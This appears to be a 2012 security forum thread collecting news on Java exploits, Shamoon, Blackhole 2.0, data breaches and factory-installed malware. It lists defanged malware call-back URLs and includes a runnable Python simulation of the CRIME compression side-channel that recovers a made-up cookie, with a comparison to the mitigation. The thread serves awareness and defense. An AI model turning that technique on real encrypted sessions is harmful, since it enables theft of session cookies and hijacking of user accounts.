Disable Java In Your Browser To Avoid A Nasty New Malware-Spreading Attack
“It’s just a matter of time that a [proof-of-concept] will be released and other bad guys will get hold of this exploit as well,” write FireEye’s researchers. “It will be interesting to see when Oracle plans for a patch, until then most of the Java users are at the mercy of this exploit.”
In the meantime, users can simply turn Java off in their browsers, a move that means sacrificing functionality on some websites but prevents possible “drive-by download” attacks that invisibly infect PCs via the Web.
Read more at :
http://www.forbes.com/sites/andygreenberg/2012/08/27/disable-java-in-your-browser-to-avoid-a-nasty-new-malware-spreading-attack/
***
-
***
World's largest oil producer falls victim to 30K workstation attack
The Saudi Arabia-based industry leader released a statement confirming that roughly 30,000 workstations were affected via cyber attack in mid-August. Details beyond that were scarce—Saudi Aramco said the virus "originated from external sources" and that its investigation into the matter was ongoing. There was no mention of whether this was related to this month's Shamoon attacks.
Read more at :
http://arstechnica.com/security/2012/08/worlds-largest-oil-producer-falls-victim-to-30k-workstation-attack/
This kind of attack could happen at oil producers in other countries.
***
-
***
Why your airline miles are easy theft targets
In the latest scam on consumers, cyber crooks are using emails and other tactics to phish for your airline miles, using them on hotels, cars and merchandise.
“When people have hundreds of thousands of miles, that’s like having money in the bank,” said George Hobica, founder of AirFareWatchdog.com, a travel site. “Consumers need to treat these accounts like they would their bank accounts or any other important account,” he said.
Many times consumers don’t even know they’ve been bilked out of their miles until they try to redeem them. This spring a Chicago couple discovered that the 175,000 miles they thought they had in their United Airlines account had been stripped down to 12,000. The airlines told them that the miles had been used for a trip to Singapore — which the couple had not taken.
Read more at :
http://articles.marketwatch.com/2012-08-22/finance/33304011_1_scam-international-airlines-fraudulent-emails
***
-
Five 0days: HP in the security dock
http://www.h-online.com/security/news/item/Five-0days-HP-in-the-security-dock-1676337.html
-
***
Lessons In Campus Cybersecurity
What universities are doing -- and should be doing -- in response to increased cyberthreats, and how students can protect their suddenly very valuable IDs
The University of Nebraska had just deployed a new security information event management (SIEM) system when an undergraduate student there apparently broke into the school's student information system, exposing sensitive information of 654,000 students, alumni, and employees.
While the breach was a serious one that is still under investigation, Nebraska was actually better off in the end than most universities that get hacked. An IT staffer detected an error message in one of the university's systems at 10 p.m. on a Wednesday evening in May, and began to escalate the issue, bringing in the security team, which investigated the activity and monitored some suspicious behavior throughout the night.
"By that next afternoon, we had figured out what had happened," says Joshua Mauk, information security officer for the University of Nebraska. An insider had accessed the university's PeopleSoft-based database.
Read more at :
http://www.darkreading.com/database-security/167901020/security/attacks-breaches/240006411/lessons-in-campus-cybersecurity.html
***
-
***
'Lulzsec hacker' latest to be arrested in US
Raynaldo Rivera, 20, is accused of being involved in hacks on Sony Pictures in May and June last year, in which thousands of personal details were published online.
If convicted, he could face up to 15 years in prison.
The FBI alleged he had worked with Cody Kretsinger, a 24-year-old who pleaded guilty to hacking charges in April.
Lulzsec, an off-shoot of the Anonymous hacking collective, gained notoriety last year with a string of high-profile attacks on websites and businesses.
Read more at :
http://www.bbc.co.uk/news/technology-19409205
***
-
***
While the below is not so new to the regulars here, it is my hope that many newbies here will read and become informed.
Security researchers from Websense have intercepted a currently circulating spam campaign, impersonating popular antivirus vendors in an attempt to trick end and corporate users into downloading and executing the malicious attachment.
...... and is currently impersonating Symantec, F-Secure, Verisign and Sophos.
Upon successful execution, the sample phones back to hxxp://bluemountain-ecards.net/images/loader.php (69.73.138.167), hxxp://asselegis.org.br/images/txt.txt (187.73.33.54), hxxp://basketcoach.com/images/logos/Plugin.dll (94.23.235.157).
Users are advised to avoid interacting with the emails, and to consider reporting them as spam as soon as they come across them.
See & read more at :
http://www.zdnet.com/cybercriminals-impersonate-popular-security-vendors-serve-malware-7000003433/
***
-
***
Hackers vow 'hellfire' in latest major data leak
A group of hackers has released a vast quantity of data from banks, government agencies, consulting firms and many others and promised more data leaks in the future.
"Team GhostShell's final form of protest this summer against the banks, politicians and for all the fallen hackers this year," the group, which calls itself -- you guessed it -- "Team GhostShell," wrote in a Pastebin post titled "Project HellFire" this weekend. "With the help of it's [sic] sub-divisions, MidasBank & the newest branch, OphiusLab. One million accounts/records leaked. We are also letting everyone know that more releases, collaborations with Anonymous and other, plus two more projects are still scheduled for this fall and winter. It's only the beginning."
Read more at :
http://news.cnet.com/8301-1009_3-57501931-83/hackers-vow-hellfire-in-latest-major-data-leak/
***
-
***
Threats from Within: Former Moto Engineer Gets Jail for Espionage
Earlier this week, a judge sentenced Hanjuan Jin to four years in prison for stealing trade secrets from Motorola Solutions. The case has all the makings of a Law and Order episode—a naturalized American gets routinely screened by a customs agent at the airport as she's about to board her flight to China—but it also points out the importance of monitoring IT systems. While it's true that competitors are after our companies' innovations, security experts will verify that many, if not most, security breaches begin from the inside. The specifics of Jin's case, as reported from the FBI, provide some clues as to where suspicions could have been raised.
Read more at :
http://www.crn.com/blogs-op-ed/women-of-the-channel/240006578/threats-from-within-former-moto-engineer-gets-jail-for-espionage.htm?cid=nl_sec
***
-
***
Counting the cost of e-crime to retailers.
Actually it’s £205.4 million a year.
The British Retail Consortium (BRC) has released the findings of their first e-crime study. The study is based on responses to a quantitative survey conducted between April and May 2012. Respondents were members of the BRC drawn from a selection of key retailing types including supermarkets, department stores, fashion, health and beauty and mixed retail. The retailers questioned constitute around 45 per cent of the UK retail sector by turnover.
Read more at :
http://brianpennington.co.uk/2012/08/23/counting-the-cost-of-e-crime-to-retailer-actually-its-205-4-million-a-year/
***
-
***
New Secure Russian Tablet Keeps Data Out Of Google’s Hands
MOSCOW – It seems Russia’s defence ministry doesn’t trust Google’s tablet computers: a new Android device boasts encryption and works with software and a global positioning system made in Russia.
The National Nuclear Research University in Moscow has presented a top Russian government official with what resembled an Android operating system device but was actually a very similar domestic equivalent.
Thursday’s unveiling at a Berlin consumer electronics conference marked what Russia hopes will be the start of mass production of its first domestic tablet to rival devices developed by the US Internet search giant.
Read more at :
http://www.security-faqs.com/new-secure-russian-tablet-keeps-data-out-of-googles-hands.html
I see keeping data out of Google's hands as a good thing!
***
-
***
A who's who of Mideast-targeted malware
What do Stuxnet, Duqu, Gauss, Mahdi, Flame, Wiper, and Shamoon have in common?
For the second time in two weeks a virus outbreak has been reported at an energy company in that region. Qatari liquefied natural gas producer RasGas said its corporate network and Web site were down after getting hit by a virus on Monday. Earlier this week the Saudi Aramco oil company confirmed that its network was hit by a virus two weeks ago, shutting down 30,000 workstations. Neither company identified the virus, but in at least one of the cases it is believed to be malware known as "Shamoon."
These are just the latest attacks targeting organizations in the region recently involving malware designed to steal secrets, wipe data, shut down corporate computers, and even sabotage nuclear power plants. Some of them are believed to be related, but others are not. Several were discovered in the course of researchers investigating others.
Read much more at :
http://news.cnet.com/8301-1009_3-57503949-83/a-whos-who-of-mideast-targeted-malware/
***
EDIT - I forgot to mention that many of these, such as Wiper, could be used against your own IP, Facebook, etc. which could wipe-out not only your on-line life but also too much personal material that will not be recoverable.
***
-
***
Report: Advanced Malware Targeting Organizations up Nearly 400 Percent
There’s been a huge jump in malicious, web-based infections targeting companies in the last year, a nearly 400 percent increase from last year, according to research released today by network security company FireEye. The company’s “Advanced Threat Report – 1H 2012,” blames the jump on attackers’ ability to penetrate organizations’ usual security infrastructures.
The report goes on to warn about the dangers of e-mail-based attacks, citing a 56 percent increase in the amount of email-based attacks that defeated "organizations' traditional security mechanisms," from January to June this year.
Read more at :
http://threatpost.com/en_us/blogs/report-advanced-malware-targeting-organizations-nearly-400-percent-083012
***
-
***
Hertfordshire plod passwords leaked by pro-Assange data burglar
A UK police website has been hacked, exposing usernames, unencrypted passwords and other sensitive login details for more than 90 serving officers.
The miscreant who raided the Hertfordshire force's database also lifted and leaked workplace phone numbers, email addresses, warrant numbers and PINs of the county's Safer Neighbourhood Team.
The hacker claims to be a sympathiser of Julian Assange, who is holed up in Ecuador's embassy in London to avoid extradition to Sweden, and the digital break-in is seen as a protest against efforts by UK police to arrest the Wikileaker-in-chief.
Read more at :
http://www.theregister.co.uk/2012/08/31/herts_police_website_hack/?utm_medium=twitter&utm_source=twitterfeed
***
-
***
Philips databases pillaged and leaked SECOND time in a month
Anonymous piles into electronics giant
Electronics giant Philips has been hacked for the second time in a month and its databases raided.
Usernames and encrypted passwords were leaked after the breach. It is not clear at this moment whether email addresses or the actual contents of corporate emails were included in the records dumped from the company's SQL databases. The lifted data was uploaded to various file hosting sites by hacktivists, who used blogs (since taken down by Google's Blogspot service) and social networks, using the hashtag labels "AntiSec" and "LulzSecReborn" to spread the word.
Read more at :
http://www.theregister.co.uk/2012/08/31/philips_anon_hack/
***
-
Java Runtime Environment 1.7.0.7
http://www.java.com/en/download/inc/windows_new_xpi.jsp
The new vulnerability allows a complete Java Virtual Machine sandbox escape in Java 7 Update 7, researchers from Security Explorations say
https://www.infoworld.com/d/security/researchers-find-critical-vulnerability-in-java-7-patch-hours-after-its-release-201472
:'(
-
Still 1,300 websites for banks and government institutions that still use insecure weak MD5-signed certificates: http://news.netcraft.com/archives/2012/08/31/governments-and-banks-still-using-weak-md5-signed-ssl-certificates.html (link = Netcraft research results)
polonus
-
Hi Dim@rik,
Probably won't be long that new vulnerabilities will be found for that same Java hole, it only needs some further deeper diggin', a message as such comes reported here: http://www.forbes.com/sites/andygreenberg/2012/08/30/oracle-quietly-releases-fix-for-serious-java-security-bug-months-after-it-was-reported/
(article author = Forbes staff's Andy Greenberg).
That is why users should not install Java when they do not feel the need for it, or use it only on an on-demand basis inside a browser.
For Firefox I changed the config settings, see: http://kb.mozillazine.org/About:config_entries so an extra click will alert me to enable Java on that occasion or not.
Google Chrome already has such a configuration as by default and means to verify and auto-update plug-ins. Also it is a tad trickier for Java to escape from the Google Chrome sandbox....but it is also vulnerable to certain Java manipulation....
As auto-update never will alert for non-issued patches and loads of users are known to be slack on updates anyhow/anyway for whatever software, the so-called security illiterate and there are many of those users around, the problems are bound to linger on for quite some time and it is high season for malcreants and cybercriminals alike,
polonus
-
FinFisher Spy tool for Android Spotted in Canada (http://www.hotforsecurity.com/blog/the-government-wants-your-mobile-finfisher-spy-tool-for-android-spotted-in-canada-3293.html?goback=%2Egde_1003727_member_158272783)
-
Here we go again: Critical flaw found in just-patched Java ::)
Emergency fix rushed out half-baked
http://www.theregister.co.uk/2012/08/31/critical_flaw_found_in_patched_java/
Critical bug in newest Java gives attackers complete control of PCs
http://arstechnica.com/security/2012/08/critical-bug-discovered-in-newest-java/
-
Chemical biz 'Nitro' hackers use Java to coat PCs in poison ivy
Chinese spying crew is back in business
http://www.theregister.co.uk/2012/08/31/nitro_hackers_abuse_java_exploit/
-
I found something from Sophos. Some attacks on the Java security hole are hidden in a fake email from Microsoft. (http://nakedsecurity.sophos.com/2012/09/03/java-security-hole-microsoft/)
I had Java on my computer earlier this year. When the Secunia PSI (a program which is capable of automatically patching it) didn't patch the installation, I decided to uninstall Java. There is one website I still use that requires it for a packet loss test. I'm glad I no longer have it installed. I don't hate or dislike Oracle but I think if they want to improve their image they need to do a better job patching Java.
-
Nothing new in that for every security hole found there is likely to be a social engineering email purporting to have a patch, etc.
-
There is new malware that targets Linux and Mac OS X. (http://www.techspot.com/news/50009-new-malware-targets-linux-and-mac-os-x.html) I found it using Google Search. It has stolen some passwords in some web browsers.
-
***
Swedish Government websites shut down by hacker attacks
Swedish government websites were jammed by hackers for hours Monday, with some supporters of WikiLeaks founder Julian Assange claiming responsibility on Twitter.
The websites of the Swedish government, Armed Forces and the Swedish Institute were among those experiencing problems.
Read more at :
http://my.earthlink.net/article/tec?guid=20120903/12eccc64-f936-47e9-8d6e-e90071c3c574
***
-
Google suspicious sign-in alert contains a trojan
http://www.h-online.com/security/news/item/Google-suspicious-sign-in-alert-contains-a-trojan-1698349.html
-
Google suspicious sign-in alert contains a trojan
http://www.h-online.com/security/news/item/Google-suspicious-sign-in-alert-contains-a-trojan-1698349.html
It's nice to see that avast! is one of 50% of the AV's at Virus Total (https://www.virustotal.com/file/df0b64f5d00af9da8adb4da3f72b559a517631cbd497c0ac03ccf81a256cc23a/analysis/) that catch this nasty trojan.
-
***
Cambodia set to expel Pirate Bay founder to Sweden
Cambodian police said Tuesday they will deport a Swedish founder of the popular file-sharing site The Pirate Bay as soon as the country's interior minister gives his approval. Deputy National Police chief Sok Phal said the decision to expel Gottfrid Svartholm Warg came after visiting Swedish officials presented legal documents on the copyright infringement case against him.
Cambodia has no extradition treaty with Sweden, so the expulsion can be done through an administrative process, such as revoking a visa, rather than legal proceedings.
Irate sympathizers meanwhile claimed to have hacked a number of Cambodian websites in retaliation for Svartholm Warg's arrest, which took place at the request of Swedish authorities last Thursday at a home he had rented in the Cambodian capital, Phnom Penh.
Read more at :
http://my.earthlink.net/article/tec?guid=20120904/a1e89ff9-f5df-4b31-a79b-f920173c3d36
***
-
***
Hackers Ready 'Fake' Windows 8 Antivirus Tool
Windows 8 isn’t out yet, but hackers are already taking advantage of the buzz surrounding the name.
According to security firm McAfee, the company has come across a fake antivirus/antimalware tool called “Win 8 Security system” that claims to detect malware but in fact does nothing more than throw up fake warnings that it offers to “fix” in exchange for a fee.
See & read more at :
http://www.forbes.com/sites/adriankingsleyhughes/2012/09/04/hackers-ready-fake-windows-8-antivirus-tool/
***
-
***
One million Apple IDs leaked online, hackers claim
A HACKING group claims to have released one million Apple device IDs that it says were stolen from an FBI computer.
The group AntiSec also claims to have access to more than 12 million other IDs, which it has not released, as well as account holders' personal information. The personal information is said to include user names, device names, telephone numbers and addresses.
According to experts this information could be handed to spammers and potentially used to infect computers and steal credit card details.
Read more at :
http://www.independent.ie/business/technology/one-million-apple-ids-leaked-online-hackers-claim-3219163.html
FBI Agent's Laptop 'Hacked' To Grab 12 Million Apple IDs - UPDATED
Three years ago special agent Christopher Stangl appeared in a video calling on people with computer science degrees to join the Federal Bureau of Investigation, saying they were needed “more than ever.” Last night, hackers with subversive online networks Anonymous and Antisec answered that call with nothing short of irreverence: they published what they claimed were more than 1 million unique device identifier numbers (UDIDs) for Apple devices, stolen from Stangl’s own laptop.
In total, the hackers say they were able to steal more than 12 million of these strings of numbers and letters, but, “we decided a million would be enough to release.” They announced the hack through the widely-watched Twitter feed, @AnonymousIRC last night.
Read more at :
http://www.forbes.com/sites/parmyolson/2012/09/04/fbi-agents-laptop-hacked-to-grab-12-million-apple-ids-anonymous-claims/
***
-
***
New Mac malware stealing passwords
The malware targets computers running OS X and Linux. Known as Wirenet.1, it steals passwords you entered via web browsers such as Chrome, Chromium, Firefox and Opera, and it will also log keystrokes, according to the Russian antivirus experts, reports IT Wire.
Wirenet.1 installs itself as WIFIADAPT in the user’s home directory, according to the researchers.
Read more at :
http://www.macworld.co.uk/macsoftware/news/?newsid=3379049&olo=rss
***
-
Hackers Release 1 Million iOS Device UDIDs Obtained from FBI Laptop
http://www.macrumors.com/2012/09/04/hackers-release-1-million-ios-device-udids-obtained-from-fbi-laptop/
-
Some security experts say Java is still not safe. The source is InformationWeek (http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=newssearch&cd=1&cad=rja&ved=0CC4QqQIoADAA&url=http%3A%2F%2Fwww.informationweek.com%2Fsecurity%2Fattacks%2Fjava-still-not-safe-security-experts-say%2F240006876&ei=IRVJUOzMEMjm0gH2toHwAQ&usg=AFQjCNHxhLXyU9cyighTSUsJALaQqXNyHQ&sig2=5mbLFMOJZeITlNQkI4E-ig).
-
***
Ransomware Malware on the Rise
The number of new ransomware samples jumped roughly 50 percent between the first and second quarters of 2012.
Ransomware restricts access to infected computer systems so that attackers can extort payments in exchange for restoring access. According to McAfee, the number of new ransomware threats increased to more than 120,000 during the second quarter, a significant jump from the first quarter.
Read more at :
http://www.eweek.com/c/a/Security/McAfee-Ransomware-Malware-on-the-Rise-705358/?kc=EWKNLEDP09062012E
***
-
Microsoft Security Bulletin Advance Notification for September 2012
http://technet.microsoft.com/en-us/security/bulletin/ms12-sep
-
***
Despite Oracle's Patch, New Java 7 Vulnerabilities Emerge
Oracle last week issued a relatively rare unscheduled patch aimed at closing two vulnerabilities in Java 7 that opened the door to drive-by hacking. The security research group in Poland, which was instrumental in identifying the earlier vulnerabilities, now says it has found new weaknesses in Java 7 that enable a complete sandbox escape.
Read more at :
http://www.crn.com/news/security/240006688/despite-oracle-8217-s-patch-new-java-7-vulnerabilities-emerge.htm?cid=nl_sec
***
-
Version 15.0.1 of Firefox fixes a bug that exposed websites visited in private browsing mode. This is according to CSO Magazine (http://www.google.com/news/url?sr=1&sa=t&ct2=us%2F0_0_s_0_0_t&usg=AFQjCNGj1ILu55OXP6u1nGyckuyfFS9qWg&did=f7511ba743c14569&sig2=SNwiUxRvmpXXujy2GWM9Vw&cid=26389765800219&ei=o4lKUPjOLMSutwePZg&rt=STORY&vm=STANDARD&url=http%3A%2F%2Fwww.cso.com.au%2Farticle%2F435775%2Ffirefox_15_0_1_fixes_bug_exposed_websites_visited_private_browsing_mode%2F).
-
Google quietly snaps up internet security firm VirusTotal for an undisclosed amount
http://www.engadget.com/2012/09/07/google-acquires-virustotal/
http://www.forbes.com/sites/ericsavitz/2012/09/07/google-buys-virustotal/
http://cloud.trendmicro.com/google-and-virustotal-a-big-win-for-security-industry/
-
from Omid's TechBlog!
Outlook.com Gets 1 Million Users in First 6 Hours
http://techblog.omidfarhang.com/2012/08/outlookcom-gets-1-million-users-in.html
-
***
The real source of Apple device IDs leaked by Anonymous last week
A small Florida publishing company says the million-record database of Apple gadget identifiers released last week by the hacker group Anonymous was stolen from its servers two weeks ago. The admission, delivered by the company’s CEO exclusively to NBC News, contradicts Anonymous' claim that the hacker group stole the data from an FBI agent's laptop in March.
Anonymous’ accusations garnered attention because they suggested that the FBI was using the unique gadget identifiers -- called UDIDs -- to engage in high-level spying on American citizens via their iPhones, iPads, and iPod Touch devices. The FBI denied the claim, last week, and when asked to comment for this story, referred to last week’s denial.
Paul DeHart, CEO of the Blue Toad publishing company, told NBC News that technicians at his firm downloaded the data released by Anonymous and compared it to the company's own database. The analysis found a 98 percent correlation between the two datasets.
Read much more at :
http://redtape.nbcnews.com/_news/2012/09/10/13781440-exclusive-the-real-source-of-apple-device-ids-leaked-by-anonymous-last-week
***
-
***
Wyndham Hotels challenges FTC security suit over breaches
Wyndham Hotels and Resorts has filed a motion in U.S. District Court in Phoenix to dismiss a complaint launched by the Federal Trade Commission (FTC) over the chain's repeated security breaches.
According to the FTC, the offenses began when Russian hackers breached Wyndham's Phoenix data center in 2008 and stole the financial information of customers, leading to two subsequent breaches in a two-year period.
The FTC filed a lawsuit against Wyndham in June, claiming that more than $10 million in fraudulent purchases were made with hundreds of thousands of credit card numbers belonging to customers.
In response, Parsippany, N.J.-based Wyndham moved to dismiss the complaint on Aug. 27, saying in its filing that the FTC “singled out” Wyndham in “unprecedented litigation.”
Read more at :
http://www.scmagazine.com/wyndham-hotels-challenges-ftc-security-suit-over-breaches/article/258559/
***
-
***
Microsoft says "No!" to insecure certificate practices
Beginning in October, Windows computers consuming updates directly from Microsoft will no longer accept digital certificates that are signed with RSA keys smaller than 1024 bits.
This includes SSL certificates, Authenticode code signing certificates, email certificates, and any other certificates validated by the Windows Crypto APIs.
Why is this so important? It may break old applications, but it sets a new minimum standard that everyone should have adopted long ago.
The problem is many organizations got stuck in time and have not increased their key strength as flaws have been found and computing power has increased.
512-bit RSA keys were factored in 1999, while RSA 768 was factored in 2009. The reasonable conclusion is that these ciphers are no longer safe from snooping and need to be retired.
Read more at :
http://nakedsecurity.sophos.com/2012/09/11/microsoft-says-no-to-insecure-certificate-practices/?utm_campaign=Feed%3A+nakedsecurity+%28Naked+Security+-+Sophos%29&utm_medium=twitter&utm_source=twitterfeed
***
-
***
Cosmo, the Hacker ‘God’ Who Fell to Earth
Cosmo is huge — 6 foot 7 and 220 pounds the last time he was weighed, at a detention facility in Long Beach, California on June 26. And yet he’s getting bigger, because Cosmo — also known as Cosmo the God, the social-engineering mastermind who weaseled his way past security systems at Amazon, Apple, AT&T, PayPal, AOL, Netflix, Network Solutions, and Microsoft — is just 15 years old.
He turns 16 next March, and he may very well do so inside a prison cell.
Cosmo was arrested along with dozens of others in a recent multi-state FBI sting targeting credit card fraud. It is the day before his court date, but he doesn’t know which task force is investigating him or the name of his public defender. He doesn’t even know what he’s been charged with. It’s tough to narrow it down; he freely admits to participation in a wide array of crimes.
Read much more at :
http://www.wired.com/gadgetlab/2012/09/cosmo-the-god-who-fell-to-earth/all
***
-
Blackhole Exploit Kits update to v2.0
BlackHole exploit Kit 2.0
Are pleased to welcome you to a brand new version of the bundle of exploits. For more than 2 years of existence of our project, the old engine arrival and ligaments badly worn, AV companies have become very quick to recognize that this kind of criteria BlackHole and flag it as malware. In the new version we have rewritten from scratch, and re-written from scratch is not only part of the issuance of exploits, but also the admin pane
http://malware.dontneedcoffee.com/2012/09/blackhole2.0.html
-
***
From brand new laptop to infected by pressing 'on'
A customer in Shenzhen, China, took a brand new laptop out of its box and booted it up for the first time. But as the screen lit up, the computer began taking on a life of its own. The machine, triggered by a virus hidden in its hard drive, began searching across the Internet for another computer.
The laptop, supposedly in pristine, super-fast, direct-from-the-factory condition, had instantly become part of an illegal, global network capable of attacking websites, looting bank accounts and stealing personal data.
Read much more at :
http://my.earthlink.net/article/tec?guid=20120913/8490b60d-f4ad-472c-ad1a-cb96f0ab27a8
***
-
***
UK spy agency asks academics to tackle cyber risks
Britain's government says a new research institute partly funded by the country's eavesdropping spy agency will ask mathematicians and computer scientists to join the fight against cyber threats.
The Government Communications Headquarters, or GCHQ — Britain's equivalent of the U.S. National Security Agency — said Thursday that a new 3.8-million-pound ($6.1-million) program would fund a research institute at University College London.
Read more at :
http://my.earthlink.net/article/tec?guid=20120913/36297ea6-cbfa-4f24-b1c7-baf923d6ba50
***
-
***
Five Epic Hacks That Never Happened
These days when there’s trouble on the internet, there’s usually someone at the ready to jump up and take (or assign) blame for whatever went wrong, nevermind the facts. It can mean free publicity for your cause — whether it’s killing laws like SOPA or beefing up the federal budget for cyber security.
Sometimes it doesn’t take much more than a tweet and a Pastebin post to get a serious amount of free publicity. So in the spirit of yesterday’s GoDaddy incident where a random Twitter handle claimed to have downed the hosting giant, here are five great hacks that never happened — despite what you might have learned from the media.
Read more at :
http://www.wired.com/threatlevel/2012/09/hacks-that-never-happened
***
-
Cybercriminals have opened a new front in their battle to infect computers with malware - PC production lines.
Several new computers have been found carrying malware installed in the factory, suggests a Microsoft study.
One virus called Nitol found by Microsoft steals personal details to help criminals plunder online bank accounts.
Microsoft won permission from a US court to tackle the network of hijacked PCs made from Nitol-infected computers.
Domain game
In a report detailing its work to disrupt the Nitol botnet, Microsoft said the criminals behind the malicious program had exploited insecure supply chains to get viruses installed as PCs were being built.
The viruses were discovered when Microsoft digital crime investigators bought 20 PCs, 10 desktops and 10 laptops from different cities in China.
Four of the computers were infected with malicious programs even though they were fresh from the factory.....
"We found malware capable of remotely turning on an infected computer's microphone and video camera, potentially giving a cybercriminal eyes and ears into a victim's home or business," said Richard Boscovich, a lawyer in Microsoft's digital crimes unit in a blogpost.
more on link
http://www.bbc.com/news/technology-19585433
-
***
Crack in Internet's foundation of trust allows HTTPS session hijacking
Attack dubbed CRIME breaks crypto used to prevent snooping of sensitive data.
Researchers have identified a security weakness that allows them to hijack web browser sessions even when they're protected by the HTTPS encryption that banks and e-commerce sites use to prevent snooping on sensitive transactions.
The technique exploits web sessions protected by the Secure Sockets Layer and Transport Layer Security protocols when they use one of two data-compression schemes designed to reduce network congestion or the time it takes for webpages to load. Short for Compression Ratio Info-leak Made Easy, CRIME works only when both the browser and server support TLS compression or SPDY, an open networking protocol used by both Google and Twitter. Microsoft's Internet Explorer, Google's Chrome and Mozilla's Firefox browsers are all believed to be immune to the attack, but at time of writing smartphone browsers and a myriad of other applications that rely on TLS are believed to remain vulnerable.
Read more at :
http://arstechnica.com/security/2012/09/crime-hijacks-https-sessions/
***
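As an added illustration of the compression-ratio leak the article describes (example code written for this thread, not from the article or its researchers): an attacker-chosen URL path and the browser's secret cookie compressed in one DEFLATE window, with the size alone revealing whether a guessed byte extends the match, beside the same data compressed in separate windows, which is what disabling TLS/SPDY compression achieves. The cookie name, value and host are constructed, and fixed Huffman tables (Z_FIXED) are used so that each avoided literal shows as exactly one byte.

```python
import string
import zlib

# Constructed demo values: the cookie name is public (the attacker knows it),
# the value is the secret. The host name is made up for the example.
COOKIE_NAME = "auth_token"
SECRET_VALUE = "7f3a9c2"
HOST = "bank.example"
ALPHABET = string.hexdigits[:16]          # "0123456789abcdef"


def deflate_len(data: bytes) -> int:
    """Compressed size in bytes. Fixed Huffman tables (Z_FIXED) give every
    literal and length code a constant cost, so one avoided literal is exactly
    one byte; real TLS/SPDY used dynamic tables, which only adds noise."""
    comp = zlib.compressobj(level=9, strategy=zlib.Z_FIXED)
    return len(comp.compress(data) + comp.flush())


def request_bytes(path: str) -> bytes:
    """Plaintext of one request: the attacker-chosen path plus the Cookie
    header the browser adds on its own, compressed as a single unit."""
    return (f"GET {path} HTTP/1.1\r\nHost: {HOST}\r\n"
            f"Cookie: {COOKIE_NAME}={SECRET_VALUE}\r\n\r\n").encode()


def shared_context_len(guess: str) -> int:
    """Vulnerable setup: path and cookie share one DEFLATE window. When the
    guess extends the LZ77 match against the Cookie header, output shrinks."""
    return deflate_len(request_bytes(f"/?q={COOKIE_NAME}={guess}"))


def separate_context_len(guess: str) -> int:
    """Mitigated setup: attacker-controlled bytes never share a window with
    the secret (equivalently, TLS compression is simply switched off)."""
    head = f"GET /?q={COOKIE_NAME}={guess} HTTP/1.1\r\nHost: {HOST}\r\n".encode()
    cookie = f"Cookie: {COOKIE_NAME}={SECRET_VALUE}\r\n\r\n".encode()
    return deflate_len(head) + deflate_len(cookie)


def recover_secret(length_oracle, length: int) -> str:
    """Byte-at-a-time recovery using only the record sizes visible on the
    wire. Stops as soon as no single guess is the unique shortest."""
    known = ""
    for _ in range(length):
        sizes = {c: length_oracle(known + c) for c in ALPHABET}
        best = min(sizes.values())
        winners = [c for c, n in sizes.items() if n == best]
        if len(winners) != 1:
            break
        known += winners[0]
    return known


if __name__ == "__main__":
    n = len(SECRET_VALUE)
    print("shared window   :", repr(recover_secret(shared_context_len, n)))
    print("separate windows:", repr(recover_secret(separate_context_len, n)))
```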
-
***
Minnesota woman fined $222,000 for 24 illegal song downloads
The first jury trial for a file-sharing suit brought by the major record labels has resulted in a $222,000 fine for a Minnesota woman accused of downloading and distributing more than 1,700 songs on the file-sharing site KaZaA. The court also forbid the woman, Jammie Thomas-Rasset, from making sound recordings available for distribution in the future.
Prosecuting 1,700 songs might have been a bit unwieldy, so the Recording Industry Association of America (RIAA) instead focused on 24 illegally downloaded and shared music files.
A group of six recording companies first contacted Thomas-Rasset in 2005 after hiring MediaSentry, an online investigative firm, to look into suspected copyright infringement.
She turned down their initial demand of a $4,500 settlement.
Read more at :
http://nakedsecurity.sophos.com/2012/09/13/minnesota-woman-fined-222000-for-24-illegal-song-downloads/?utm_campaign=Feed%3A+nakedsecurity+%28Naked+Security+-+Sophos%29&utm_medium=twitter&utm_source=twitterfeed
***
-
***
New version of Blackhole exploit kit
Yesterday there were reports of an announcement that a new version (v2.x no less) of Blackhole exploit kit is on its way.
Blackhole is arguably the most successful exploit kit we have seen over the past couple of years, and we have described it in detail before (v1.x). The opening paragraph sets out what appears to be the main aim of the new version - improve how well they evade security measures:
"Are pleased to welcome you to a brand new version of the bundle of exploits. For more than 2 years of existence of our project, the old engine arrival and ligaments badly worn, AV companies have become very quick to recognize that this kind of criteria BlackHole and flag it as malware."
Read & see more at :
http://nakedsecurity.sophos.com/2012/09/13/new-version-of-blackhole-exploit-kit/?utm_campaign=Feed%3A+nakedsecurity+%28Naked+Security+-+Sophos%29&utm_medium=twitter&utm_source=twitterfeed
***
-
***
University of Miami Hospital Confirms Second Patient Info Breach This Year
The University of Miami Hospital (UMH) has begun to notify patients for the second time this year that some of their personal information may be at risk after the health care institution was hit with a data breach in July. According to a letter being sent to patients this month, two employees at the hospital were found “inappropriately accessing” patients' “face sheets," documents that give doctors a quick glance at patients' information. The employees have been terminated but may have since sold some of the sensitive information, according to information provided to the hospital by local law enforcement on July 18.
That information includes patients’ names, addresses, dates of birth, insurance policy numbers and the reason they visited the hospital. The hospital warns that the last four digits of patients’ Social Security numbers were also on these “fact sheets” and that some insurance plans still use patients’ SSNs as their insurance policy numbers, which are also on the sheets.
According to the letter, the breach affects any patients who may have been seen at the hospital on the Miller School of Medicine campus in Miami between October 2010 and July 2012. Patients who visited other divisions of the hospital offsite, including the Bascom Palmer Eye Institute, Sylvester Comprehensive Cancer Center, Sylvester at Deerfield Beach or Kendall, and UHealth at Plantation, aren’t at risk.
Read more at :
http://threatpost.com/en_us/blogs/university-miami-hospital-confirms-second-patient-info-breach-year-091212
***
-
***
End User Security Awareness Gap Remains Wide, Experts Say
Enterprise-driven security education programs continue to fall short of the mark
In a new survey on security training, Trustwave found that while 56 percent of security professionals claim they train new users during orientation, only 32 percent of employees say they have been educated on enterprise security.
This training gap has resulted in serious problems for some companies, according to the Trustwave study. Enterprises experience some 14.4 incidents of data loss per year due to employee negligence, and 15 percent of them have reported an insider breach executed with malicious intent.
Read more at :
http://www.darkreading.com/security/security-management/240007247/end-user-security-awareness-gap-remains-wide-experts-say.html
***
-
Microsoft finds malware on new computers in China
http://bigstory.ap.org/article/brand-new-laptop-infected-pressing#overlay-context=article/nyc-big-soda-crackdown-plan-goes-vote-thursday
urlvoid
http://www.urlvoid.com/scan/3322.org/
-
Hi Dima,
Blackhole 2.0 seems not to be Google Chrome browser friendly, so if users are asked to open up in firefox or IE, they should NOT do so to avoid infection.
See: http://ondailybasis.com/blog/wp-trackback.php?p=1330 article by Dennis Laskov, link: on daily basis blog
polonus
-
***
Microsoft Takes Aim At Nitol Botnet
